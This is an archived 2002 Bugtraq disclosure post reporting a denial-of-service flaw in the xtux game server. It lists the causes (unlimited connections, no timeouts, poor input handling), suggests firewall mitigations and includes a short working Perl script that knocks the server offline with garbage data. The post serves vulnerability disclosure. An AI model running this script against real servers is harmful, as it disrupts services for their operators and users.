8125013 2002-03-09 15:53 -0700 /46 rader/ b0iler _ <b0iler@hotmail.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-03-11 19:55 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <21344>
Ärende: xtux server DoS.
------------------------------------------------------------
From: "b0iler _" <b0iler@hotmail.com>
To: bugtraq@securityfocus.com
Message-ID: <F2797jtrSByh133tYwl00016d20@hotmail.com>
After telnetting into a xtux server a few times and typing random
stuff I noticed the sever stopped responding. Xtux is a really cool
game for linux, you should try it. It also took up 70% cpu before I
killed it. Then coded a small perl script to test this, worked
everytime I tested. I emailed the author of xtux a few days ago,
haven't heard anything yet. I figure the problems that need to be
addressed are:
the number of connections from one host. - currently unlimitted. the
total number of connections. - currently unlimitted. some sort of
timeout for the server - currently the client handles timeouts but
server allows clients to stay connected without doing anything
forever. a fix for when users send garbage (don't make the
connection correctly) to the server and it becomes unresponcive.
For now I would just set tight firewall rules when you run the xtux
server, you should know who you are playing with anyways.
Here is that perl script I used to test:
#!/usr/bin/perl
#
# xtux server DoS - by b0iler
# server will become unresponcive and takes up lots of CPU.
use IO::Socket;
for($n=0;$n<=3;$n++){ #you shouldn't even need all 3 connections.
print "Connecting to $ARGV[0] port $ARGV[1]\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort =>
$ARGV[1], Proto => 'tcp' ) or print "\ncouldn't connect\n\n";
sleep 3;
print $sock "garbage data\n\n";
}
exit;
http://b0iler.advknowledge.net
_________________________________________________________________ Get
your FREE download of MSN Explorer at
http://explorer.msn.com/intl.asp.
(8125013) /b0iler _ <b0iler@hotmail.com>/-(Ombruten)